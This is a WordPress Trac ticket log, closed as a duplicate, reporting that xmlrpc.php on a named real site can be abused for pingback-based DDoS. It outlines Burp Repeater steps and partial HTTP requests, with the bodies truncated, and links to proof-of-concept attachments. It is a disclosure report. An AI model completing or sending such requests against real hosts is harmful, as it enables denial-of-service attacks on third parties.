Changes between Initial Version and Version 4 of Ticket #47551
Timestamp: 06/17/2019 03:27:31 PM
Ticket #47551 – Property changes

- Status changed from new to closed
- Owner set to marybaum
- Milestone changed from Awaiting Review to (none)
- Keywords needs-patch removed
- Resolution changed from (none) to duplicate
- Status changed from
Ticket #47551 – Description

WordPress sites that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made part of a huge botnet causing a major DDoS. The website https://blog.optimizely.com/ has the xmlrpc.php file enabled and could thus potentially be used for such an attack against other victim hosts.

In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below.

{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
…
</params>
</methodCall>
}}}

Notice that a successful response is received, showing that the xmlrpc.php file is enabled.

Now, considering the domain https://blog.optimizely.com, the xmlrpc.php file discussed above could potentially be abused to cause a DDoS attack against a victim host. This is achieved by simply sending a request that looks like the one below.

…

HTTP request
{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
…
</params>
</methodCall>
}}}

Note: please find attachments for the PoC at the following URL: https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn